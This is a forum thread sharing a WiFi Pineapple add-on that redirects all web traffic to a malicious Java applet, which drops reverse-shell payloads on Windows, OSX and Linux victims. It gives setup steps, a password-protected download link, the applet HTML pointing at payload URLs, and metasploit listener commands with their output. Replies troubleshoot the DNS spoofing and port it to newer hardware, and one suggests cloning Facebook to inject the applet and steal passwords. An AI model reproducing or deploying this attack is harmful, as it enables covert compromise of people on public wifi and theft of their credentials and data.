Jump to content

Pineapple Java Applet Attack!


reflex

Recommended Posts

Edit : Uploaded again to fix the run.html pointing to the comp rather than itself.Thanks Whistle Master.

EDIT : Im such a noob, i uploaded the files but not the ones id been working on, the index.html was meant to named run.html. Have renamed them and posted new link. Everything should be working fine now

Hi Hak5 community, thought i would post this and give something back for once.

Ive added and option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux which is selected depending on there OS (Victim needs to have Java installed).

Screens

http://i.imgur.com/z5uHj.png

http://i.imgur.com/tgtGH.png

http://i.imgur.com/nM8KU.png

http://i.imgur.com/VUkJd.png

http://i.imgur.com/KWMfA.jpg

http://i.imgur.com/PWfrT.jpg

SETUP

1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l

2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option.

3. Copy the "java" folder to /www/

4. Click Conf next to the "Evil Java" option for commands to setup listeners.

5. Enable "Evil Java" and sit back.

ABOUT

All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome).

All payloads are set to connect back to 172.16.42.42 so make sure thats your IP.

Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2

Have Fun ;)

Reflex!

Edited by reflex
Link to comment
Share on other sites

Hi reflex!

Just a quick question: I had a look on file run.html and I was wondering why the values of the Java Applet are pointing on 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no?

<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.42:80/mac.bin">
<param name="LINUX" value="http://172.16.42.42:80/nix.bin">

Thanks !

Link to comment
Share on other sites

Hi reflex!

Just a quick question: I had a look on file run.html and I was wondering why the values of the Java Applet are pointing on 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no?

<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.42:80/mac.bin">
<param name="LINUX" value="http://172.16.42.42:80/nix.bin">

Thanks !

Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The Payloads are on the pineapple. Set your ip to 172.16.42.42 then click Conf and copy paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run the payload will connect back to 172.16.42.42.

Link to comment
Share on other sites

Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The Payloads are on the pineapple. Set your ip to 172.16.42.42 then click Conf and copy paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run the payload will connect back to 172.16.42.42.

I did read the instructions but the attack was not working correctly...

According to SEC blog:

The applet has to read the operating system specific payload path and the url of the next page to show from it parameters.

Then it will check on which platform it is currently running and start to download a specific payload using the browser it runs under.

With your run.html file, the applet cannot download the specific payloads from IP 172.16.42.42 (except if you are running a web server delivering the payloads) as they are on the pineapple 172.16.42.1 and in the folder /www/java/

I therefore modified your run.html to the following and it works perfectly:

<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.1:80/java/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.1:80/java/mac.bin">
<param name="LINUX" value="http://172.16.42.1:80/java/nix.bin">

Link to comment
Share on other sites

Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Heres my scenario:

Fresh reflash to 2.1.2

Run wp3.sh

Copy java to /www/ on the pineapple

Copy contents of pineapple/ to /www/pineapple, overwriting all

Browse to 172.16.42.1/pineapple

Start karma

Click Conf for java attack

Copy/paste windows attack into my BT5 terminal

Wait for it to load

Go back to mainpage for pineapple (Status)

Click "Start" for java attack

And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Masters modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated. Thanks!

telot

Link to comment
Share on other sites

Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Heres my scenario:

Fresh reflash to 2.1.2

Run wp3.sh

Copy java to /www/ on the pineapple

Copy contents of pineapple/ to /www/pineapple, overwriting all

Browse to 172.16.42.1/pineapple

Start karma

Click Conf for java attack

Copy/paste windows attack into my BT5 terminal

Wait for it to load

Go back to mainpage for pineapple (Status)

Click "Start" for java attack

And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Masters modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated. Thanks!

telot

You also have to start DNS Spoof for this attack.

The enable "Evil Java" action does the following:

- Change the DNS Spoof settings to redirect all sites to the pineapple;

- Change the landing page.

But you can do it manualy:

Go to Configuration:

- Edit DNS Spoof Host to capture all hosts: 172.16.42.1 *

- Edit Landing Page (phishing) to change redirection: to content=“0;url=/java/run.html”

EDIT: I added a guide on the wiki

Edited by Whistle Master
Link to comment
Share on other sites

The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echos the word "up" into it. That way the pineapple can tell when its on. When you stop it echos "" into it telling it its off.

Check that the file up is in the pineapple dir and that its say up by "cat up" command when you have started the Evil Java.Thanks to Whistle Master for noticing that in the run.html have uploaded again and this time shouldbe fixed.

Edited by reflex
Link to comment
Share on other sites

The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echos the word "up" into it. That way the pineapple can tell when its on. When you stop it echos "" into it telling it its off.

Check that the file up is in the pineapple dir and that its say up by "cat up" command when you have started the Evil Java.Thanks to Whistle Master for noticing that in the run.html have uploaded again and this time shouldbe fixed.

I think we need some consistency here with this new Java attack. Theres lots of conflicting claims and none of them have been working for me. Anyone else having problems? I'm sure theres many ways to skin this cat. Reflex, since you discovered/initially designed this, could you do a once over on your instructions and fill in some gaps for us? Maybe I'm just a noob, but I'm having multiple issues and errors when trying to implement either solution (yours or Whistle Masters). Thanks for any help you can spare

telot

Link to comment
Share on other sites

Alrighty - sorry for the delay in my response, but I've been traveling the country and forgot my pineapple at home :(

Here is the output of the ls -la commands:

root@Pineapple:~# ls -la /www/ && ls -la /www/java/

drwxrwxr-x 1 root root 0 Jan 1 00:03 .

drwxr-xr-x 1 root root 0 Jan 1 00:02 ..

-rw-rw-r-- 1 root root 616 Jan 26 2012 error.php

-rw-rw-r-- 1 root root 106 Jan 1 00:07 index.php

drwxr-xr-x 2 root root 0 Jan 1 00:03 java

drwxrwxr-x 1 root root 0 Jan 1 00:04 pineapple

-rw-rw-r-- 1 root root 214 Jan 26 2012 redirect.php

drwxr-xr-x 2 root root 0 Jan 1 00:03 .

drwxrwxr-x 1 root root 0 Jan 1 00:03 ..

-rw-r--r-- 1 root root 73802 Jan 1 00:03 Qf8IYZJlKNMdl5

-rw-r--r-- 1 root root 4124 Jan 1 00:03 Signed_Update.jar

-rwxr-xr-x 1 root root 20800 Jan 1 00:03 mac.bin

-rw-r--r-- 1 root root 134 Jan 1 00:03 nix.bin

-rw-r--r-- 1 root root 14862 Jan 1 00:03 run.html

Looks about right by me. My DNS Spoof Host box under Configuration on the pineapple reads as follows:

172.16.42.1 *

My Landing Page, again under Configuration on the pineapple is as follows:

<html>

<head>

<meta http-equiv="REFRESH" content=“0;url=/java/run.html”>

</head>

<body>

</body>

</html>

I start karma and start DNS Spoof from the Status page of the pineapple. Then I download/unzip pineapplepwn.rc msf script and open a terminal and run msfconsole -r pineapplepwn.rc and here is the output:

root@root:~/Desktop# msfconsole -r pineapplepwn.rc

[-] Failed to connect to the database: FATAL: no pg_hba.conf entry for host "172.16.42.249", user "msf3", database "msf3"

{"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"eccd8310", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5} ["/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `connect'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:217:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `postgresql_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:223:in `new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:245:in `checkout_new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:188:in `block (2 levels) in checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `loop'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `block in checkout'", "/opt/framework/ruby/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:183:in `checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:98:in `connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:326:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:123:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:115:in `connection'", "/opt/framework/msf3/lib/active_record/base.rb:1271:in `columns'", "/opt/framework/msf3/lib/active_record/base.rb:1284:in `column_names'", "/opt/framework/msf3/lib/active_record/base.rb:1297:in `column_methods_hash'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `block in all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `each'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1842:in `method_missing'", "/opt/framework/msf3/lib/msf/core/model/workspace.rb:69:in `default'", "/opt/framework/msf3/lib/msf/core/db.rb:189:in `default_workspace'", "/opt/framework/msf3/lib/msf/core/db_manager.rb:166:in `connect'", "/opt/framework/msf3/lib/msf/ui/console/driver.rb:186:in `initialize'", "/opt/framework/msf3/msfconsole:130:in `new'", "/opt/framework/msf3/msfconsole:130:in `<main>'"]

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f

EFLAGS: 00010046

eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001

esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60

ds: 0018 es: 0018 ss: 0018

Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090

90909090990909090990909090

90909090.90909090.90909090

90909090.90909090.90909090

90909090.90909090.09090900

90909090.90909090.09090900

..........................

cccccccccccccccccccccccccc

cccccccccccccccccccccccccc

ccccccccc.................

cccccccccccccccccccccccccc

cccccccccccccccccccccccccc

.................ccccccccc

cccccccccccccccccccccccccc

cccccccccccccccccccccccccc

..........................

ffffffffffffffffffffffffff

ffffffff..................

ffffffffffffffffffffffffff

ffffffff..................

ffffffff..................

ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00

Aiee, Killing Interrupt handler

Kernel panic: Attempted to kill the idle task!

In swapper task - not syncing

=[ metasploit v4.0.0-release [core:4.0 api:1.0]

+ -- --=[ 716 exploits - 361 auxiliary - 68 post

+ -- --=[ 226 payloads - 27 encoders - 8 nops

=[ svn r13462 updated 202 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 202 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

https://community.rapid7.com/docs/DOC-1306

resource (pineapplepwn.rc)> use multi/handler

resource (pineapplepwn.rc)> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

resource (pineapplepwn.rc)> set LHOST 172.16.42.42

LHOST => 172.16.42.42

resource (pineapplepwn.rc)> set LPORT 443

LPORT => 443

resource (pineapplepwn.rc)> set ExitOnSession false

ExitOnSession => false

resource (pineapplepwn.rc)> exploit -j

[*] Exploit running as background job.

resource (pineapplepwn.rc)> use multi/handler

resource (pineapplepwn.rc)> set PAYLOAD osx/x86/shell_reverse_tcp

PAYLOAD => osx/x86/shell_reverse_tcp

resource (pineapplepwn.rc)> set LHOST 172.16.42.42

LHOST => 172.16.42.42

resource (pineapplepwn.rc)> set LPORT 8080

LPORT => 8080

resource (pineapplepwn.rc)> set InitialAutoRunScript post/osx/gather/enum_osx

InitialAutoRunScript => post/osx/gather/enum_osx

resource (pineapplepwn.rc)> set ExitOnSession false

ExitOnSession => false

resource (pineapplepwn.rc)> exploit -j

[-] Handler failed to bind to 172.16.42.42:443

[*] Started reverse handler on 0.0.0.0:443

[*] Starting the payload handler...

[*] Exploit running as background job.

resource (pineapplepwn.rc)> use multi/handler

resource (pineapplepwn.rc)> set PAYLOAD linux/x86/shell/reverse_tcp

PAYLOAD => linux/x86/shell/reverse_tcp

resource (pineapplepwn.rc)> set LHOST 172.16.42.42

LHOST => 172.16.42.42

resource (pineapplepwn.rc)> set LPORT 8081

LPORT => 8081

resource (pineapplepwn.rc)> set ExitOnSession false

ExitOnSession => false

resource (pineapplepwn.rc)> exploit -j

[-] Handler failed to bind to 172.16.42.42:8080

[*] Started reverse handler on 0.0.0.0:8080

[*] Starting the payload handler...

[*] Exploit running as background job.

[-] Handler failed to bind to 172.16.42.42:8081

[*] Started reverse handler on 0.0.0.0:8081

[*] Starting the payload handler...

msf exploit(handler) >

Now as I've said before, I'm a total metasploit noob. I'm only on the second chapter of securitytube's megaprimer on it. But even as a noob this output does not look good. Many fatal exceptions and Failed to binds. Pressing forward regardless, I connect my target machine to its Karma'd pineapple AP of Caribou (a local coffee shop's wifi). Which by the way, Windows7 pops up with a "Additional log on information may be required" bubble. Ignoring this I open Firefox and browse to www.facebook.com and get a white page that says "No such file or directory" and in the address bar is www.facebook.com/java/run.html" (with that end quote). Not only that, but when my attacking machine tries to browse the internet, it goes to www.hak5.org/run/java.html" - so the DNS spoof spoofed the attacking machines DNS as well?! This is the first time I've played with DNS spoof, so my noobery is again rearing its ugly head.

Is it a problem with DNS Spoof? Is it a problem with the msf script? Did I make some noob mistake? Most likely I'm sure :) Any ideas or further advice would be greatly appreciated. Thanks very much!

telot

Link to comment
Share on other sites

You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources:

svn update

Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ")

Try to replace your landing page configuration with the following (with correct ones):

&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="REFRESH" content="0;url=/java/run.html"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;

Link to comment
Share on other sites

You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources:

svn update

Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ")

Try to replace your landing page configuration with the following (with correct ones):

&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="REFRESH" content="0;url=/java/run.html"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;

Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master

telot

Link to comment
Share on other sites

telot did you ever get the disable problem fixed? if so, what fixed it.. i'm having the same problem....

Nope - havent gotten a chance to test it out till today. I will report my results this afternoon or tomorrow morning. I def want to get this working!!

telot

Link to comment
Share on other sites

  • 3 weeks later...

Edit : Uploaded again to fix the run.html pointing to the comp rather than itself.Thanks Whistle Master.

EDIT : Im such a noob, i uploaded the files but not the ones id been working on, the index.html was meant to named run.html. Have renamed them and posted new link. Everything should be working fine now

Hi Hak5 community, thought i would post this and give something back for once.

Ive added and option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux which is selected depending on there OS (Victim needs to have Java installed).

Screens

http://i.imgur.com/z5uHj.png

http://i.imgur.com/tgtGH.png

http://i.imgur.com/nM8KU.png

http://i.imgur.com/VUkJd.png

http://i.imgur.com/KWMfA.jpg

http://i.imgur.com/PWfrT.jpg

SETUP

1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l

2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option.

3. Copy the "java" folder to /www/

4. Click Conf next to the "Evil Java" option for commands to setup listeners.

5. Enable "Evil Java" and sit back.

ABOUT

All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome).

All payloads are set to connect back to 172.16.42.42 so make sure thats your IP.

Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2

Have Fun ;)

Reflex!

do you still need the extra script to run the in metasploit?

Link to comment
Share on other sites

Does anyone know if this will work on the pineapple mark iv?

The attack itself will work on mkiv, although the index.php file that is included in the package should not be uploaded.

Instead you can backup your existing index.php file in the pineapple folder before making any changes:

cp index.php index.bak

Open the one from the package above (MKIII) , copy the following code and paste it into the php segment of your MKIV index.php file

$isjavaup = exec("cat up");
if ($isjavaup != "") {
echo "Evil Java is currently &lt;font color=\"lime\"&gt;&lt;b&gt;enabled&lt;/b&gt;&lt;/font&gt;. | &lt;a href=\"stopjava.php\"&gt;&lt;b&gt;Stop&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;";
} else { echo "Evil Java is currently &lt;font color=\"red\"&gt;&lt;b&gt;disabled&lt;/b&gt;&lt;/font&gt;. | &lt;a href=\"startjava.php\"&gt;&lt;b&gt;Start&lt;/b&gt;&lt;/a&gt; | &lt;a href=\"conf.php\"&gt;&lt;b&gt;Conf&lt;/b&gt;&lt;/a&gt;&lt;br/&gt;"; }

Reboot your pineapple, and you should see the Evil Java option.

Change your landing page to redirect to /java/run.html

So far on my tests, this has worked for me, with access to metasploit working.

The only thing is, the switch status (on/off) does not work

I hope that helps, but I'm a metasploit newbie myself!

Link to comment
Share on other sites

Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interace with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know ur on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but theres an issue with the switch showing "on"? Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (I.e airmon-ng, urlsnarf, arp)

Link to comment
Share on other sites

Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interace with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know ur on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but theres an issue with the switch showing "on"? Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (I.e airmon-ng, urlsnarf, arp)

I think ngrep and urlsnarf aren't 100% functional on MKIV.

(Sebkinne says: ngrep is not installed currently)

(Thought so: :) )

I thinks it's in the list of to fix for next release of firmware, if i'm right.

see this thread: MKIV - What we know and don't know

Projects on the collective to do list and issues that need attending:

Network Pineapple Monkey - Seb has acknowledged its on his list and will become higher priority after 1.0.1 firmware is released. See this thread:

Adding Alfa AWUS036H to the Mark4: Darren commented: "...adding a 2nd WiFi Adapter, say with an AWUS036H, seems as likely as adding 3G -- so tethering is on the table." Official current status on getting it to work is unknown. During my trials, the Mark4 recognizes the realtek rtl8187 but does not assign it as a wlan adapter. Openwrt should have support for it through kmod-rtl8187

Combining storage and 3G connectivity in one card: "Two birds, one stone". Many 3G usb cards have microSD slots. Novatel U760 is a prime example. Darren and hfam both have these cards and seem to be working on it.

Ngrep is gone now and accessible only via SSH. (See: http://hak5.org/tag/ngrep for information on how to ngrep via terminal)(Sebkinne edit: It is gone. Dead. For now )

URLsnarf is missing from the UI page, but is also accessible via SSH. Darren's comment on the matter: "We're working on a revised web UI for sniffing which should bring together the power of urlsnarf, ngrep and *ettercap" Swoot!

Reaver is not present on Schmoocon version but will be via firmware update 1.0.1.

Reaver has not yet been proven to work - a proper how to guide is needed. Issue lies with mon.wlan0 - what is it used for? Can we remove it and add a proper mon0? Do we need to? Will it affect Karma as I suspect? (I'm going to try my hand at it today!)

Further 3G Dongle research - Darren's hints for us regarding 3G dongles: "Usually it's just a matter of "ejecting" the USB CD-ROM so that the modem reveals itself, at which point a bunch of uci network commands set the config, pppd does its thing with chat and comgt." - Need to clarify ejecting the usb cd-rom...

Add support for encrypting USB drives using EncryptingFS or perhaps even truecrypt?

Enable airdrop-ng support by installing python and other dependencies to usb drive

telot

Edited by RebelCork
Link to comment
Share on other sites

However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but theres an issue with the switch showing "on"?

DNS Spoof is running and you have the run.html offering up a java attack applet.It will run constantly, you can't turn it off without replacing the redirected page. If you really wanted to, you could try altering an existing web page to inject the java code for the user instead of a blank page.

For example, clone www.facebook.com and insert the code into the webpage.

That way, when your victim machine browses to the infected page the script is run automatically and they are not sitting looking at a blank screen.

Also a particulairly nasty attack would be to disguise the attack vector as one of the many popular FB games.

With an active internet connection to the pineapple, the victim will continue on his/her way to the login page, and you get the chance to steal passwords as well.

These are some of the theoretical situations I am trying to defend against. (I am trying to write a term paper for college on MITM attacks)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...